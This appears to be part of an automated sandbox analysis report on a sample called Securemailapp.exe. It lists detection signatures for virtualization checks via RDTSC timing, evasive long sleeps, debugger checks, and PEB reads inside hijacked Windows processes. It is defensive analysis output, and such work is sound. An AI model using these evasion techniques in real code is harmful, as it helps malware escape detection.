Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRDTSC instruction interceptor: First address: 0000000000407244 second address: 000000000040724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRDTSC instruction interceptor: First address: 00000000004074BE second address: 00000000004074C4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000A07244 second address: 0000000000A0724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000A074BE second address: 0000000000A074C4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_004073F0 rdtsc 2_2_004073F0
Contains long sleeps (>= 3 min)Show sources
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeThread delayed: delay time: 922337203685477Jump to behavior
Found large amount of non-executed APIsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeAPI coverage: 4.4 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\explorer.exe TID: 1496Thread sleep time: -50000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1864Thread sleep count: 57 > 30Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1864Thread sleep time: -285000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exe TID: 4880Thread sleep time: -922337203685477s >= -30000sJump to behavior
Queries disk information (often used to detect virtual machines)Show sources
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: PhysicalDrive0Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\explorer.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: explorer.exe, 00000005.00000000.599474745.0000000007560000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.599474745.0000000007560000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.599474745.0000000007560000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000005.00000000.599474745.0000000007560000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Queries a list of all running processesShow sources
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks if the current process is being debuggedShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_004073F0 rdtsc 2_2_004073F0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00408440 LdrLoadDll,2_2_00408440
Contains functionality to read the PEBShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124A93B mov eax, dword ptr fs:[00000030h]2_2_0124A93B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121B101 mov eax, dword ptr fs:[00000030h]2_2_0121B101
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121B101 mov eax, dword ptr fs:[00000030h]2_2_0121B101
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01214101 mov eax, dword ptr fs:[00000030h]2_2_01214101
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01214101 mov eax, dword ptr fs:[00000030h]2_2_01214101
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01214101 mov eax, dword ptr fs:[00000030h]2_2_01214101
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E010D mov eax, dword ptr fs:[00000030h]2_2_012E010D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E010D mov eax, dword ptr fs:[00000030h]2_2_012E010D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01247110 mov eax, dword ptr fs:[00000030h]2_2_01247110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01247110 mov eax, dword ptr fs:[00000030h]2_2_01247110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01247110 mov eax, dword ptr fs:[00000030h]2_2_01247110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122F11B mov eax, dword ptr fs:[00000030h]2_2_0122F11B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122F11B mov eax, dword ptr fs:[00000030h]2_2_0122F11B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122F11B mov eax, dword ptr fs:[00000030h]2_2_0122F11B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122F11B mov eax, dword ptr fs:[00000030h]2_2_0122F11B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122F11B mov eax, dword ptr fs:[00000030h]2_2_0122F11B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122F11B mov eax, dword ptr fs:[00000030h]2_2_0122F11B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122F11B mov eax, dword ptr fs:[00000030h]2_2_0122F11B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121B171 mov eax, dword ptr fs:[00000030h]2_2_0121B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121B171 mov eax, dword ptr fs:[00000030h]2_2_0121B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121B171 mov eax, dword ptr fs:[00000030h]2_2_0121B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121397E mov eax, dword ptr fs:[00000030h]2_2_0121397E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121397E mov eax, dword ptr fs:[00000030h]2_2_0121397E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124214F mov eax, dword ptr fs:[00000030h]2_2_0124214F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B mov eax, dword ptr fs:[00000030h]2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01213158 mov ecx, dword ptr fs:[00000030h]2_2_01213158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D1151 mov eax, dword ptr fs:[00000030h]2_2_012D1151
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121A9A6 mov eax, dword ptr fs:[00000030h]2_2_0121A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121A9A6 mov eax, dword ptr fs:[00000030h]2_2_0121A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012419B0 mov eax, dword ptr fs:[00000030h]2_2_012419B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01297194 mov eax, dword ptr fs:[00000030h]2_2_01297194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01297194 mov eax, dword ptr fs:[00000030h]2_2_01297194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01297194 mov eax, dword ptr fs:[00000030h]2_2_01297194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012151E0 mov eax, dword ptr fs:[00000030h]2_2_012151E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012151E0 mov ecx, dword ptr fs:[00000030h]2_2_012151E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012151E0 mov eax, dword ptr fs:[00000030h]2_2_012151E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012151E0 mov eax, dword ptr fs:[00000030h]2_2_012151E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012279F7 mov eax, dword ptr fs:[00000030h]2_2_012279F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012469C0 mov ecx, dword ptr fs:[00000030h]2_2_012469C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D11D2 mov eax, dword ptr fs:[00000030h]2_2_012D11D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01217025 mov eax, dword ptr fs:[00000030h]2_2_01217025
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01240021 mov eax, dword ptr fs:[00000030h]2_2_01240021
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01240021 mov eax, dword ptr fs:[00000030h]2_2_01240021
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01240021 mov eax, dword ptr fs:[00000030h]2_2_01240021
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01240021 mov eax, dword ptr fs:[00000030h]2_2_01240021
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012CF83F mov eax, dword ptr fs:[00000030h]2_2_012CF83F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01254030 mov eax, dword ptr fs:[00000030h]2_2_01254030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121383B mov eax, dword ptr fs:[00000030h]2_2_0121383B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121383B mov eax, dword ptr fs:[00000030h]2_2_0121383B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01234800 mov eax, dword ptr fs:[00000030h]2_2_01234800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01234800 mov eax, dword ptr fs:[00000030h]2_2_01234800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01234800 mov eax, dword ptr fs:[00000030h]2_2_01234800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01234800 mov eax, dword ptr fs:[00000030h]2_2_01234800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D1008 mov eax, dword ptr fs:[00000030h]2_2_012D1008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122A01A mov eax, dword ptr fs:[00000030h]2_2_0122A01A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122A01A mov eax, dword ptr fs:[00000030h]2_2_0122A01A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122A01A mov eax, dword ptr fs:[00000030h]2_2_0122A01A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122A01A mov eax, dword ptr fs:[00000030h]2_2_0122A01A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123E067 mov eax, dword ptr fs:[00000030h]2_2_0123E067
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123E067 mov eax, dword ptr fs:[00000030h]2_2_0123E067
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012AF867 mov eax, dword ptr fs:[00000030h]2_2_012AF867
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01232073 mov eax, dword ptr fs:[00000030h]2_2_01232073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01242870 mov eax, dword ptr fs:[00000030h]2_2_01242870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123F076 mov eax, dword ptr fs:[00000030h]2_2_0123F076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123F076 mov eax, dword ptr fs:[00000030h]2_2_0123F076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123F076 mov eax, dword ptr fs:[00000030h]2_2_0123F076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123F076 mov eax, dword ptr fs:[00000030h]2_2_0123F076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123F076 mov eax, dword ptr fs:[00000030h]2_2_0123F076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124E845 mov eax, dword ptr fs:[00000030h]2_2_0124E845
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DA844 mov eax, dword ptr fs:[00000030h]2_2_012DA844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DA844 mov eax, dword ptr fs:[00000030h]2_2_012DA844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01219050 mov eax, dword ptr fs:[00000030h]2_2_01219050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122F050 mov eax, dword ptr fs:[00000030h]2_2_0122F050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122F050 mov eax, dword ptr fs:[00000030h]2_2_0122F050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E08A5 mov eax, dword ptr fs:[00000030h]2_2_012E08A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E08A5 mov eax, dword ptr fs:[00000030h]2_2_012E08A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E08A5 mov eax, dword ptr fs:[00000030h]2_2_012E08A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012940A7 mov eax, dword ptr fs:[00000030h]2_2_012940A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012158BC mov eax, dword ptr fs:[00000030h]2_2_012158BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D50B3 mov eax, dword ptr fs:[00000030h]2_2_012D50B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D50B3 mov eax, dword ptr fs:[00000030h]2_2_012D50B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012A2893 mov eax, dword ptr fs:[00000030h]2_2_012A2893
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123E0E8 mov eax, dword ptr fs:[00000030h]2_2_0123E0E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012458EB mov eax, dword ptr fs:[00000030h]2_2_012458EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012458EB mov eax, dword ptr fs:[00000030h]2_2_012458EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DB8F9 mov eax, dword ptr fs:[00000030h]2_2_012DB8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DB8F9 mov eax, dword ptr fs:[00000030h]2_2_012DB8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012AF8F0 mov eax, dword ptr fs:[00000030h]2_2_012AF8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012AF8F0 mov eax, dword ptr fs:[00000030h]2_2_012AF8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D10CF mov eax, dword ptr fs:[00000030h]2_2_012D10CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012CF8C0 mov eax, dword ptr fs:[00000030h]2_2_012CF8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012448CB mov eax, dword ptr fs:[00000030h]2_2_012448CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012448CB mov eax, dword ptr fs:[00000030h]2_2_012448CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012448CB mov eax, dword ptr fs:[00000030h]2_2_012448CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012190D0 mov eax, dword ptr fs:[00000030h]2_2_012190D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012190D0 mov eax, dword ptr fs:[00000030h]2_2_012190D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012190D0 mov eax, dword ptr fs:[00000030h]2_2_012190D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121C330 mov eax, dword ptr fs:[00000030h]2_2_0121C330
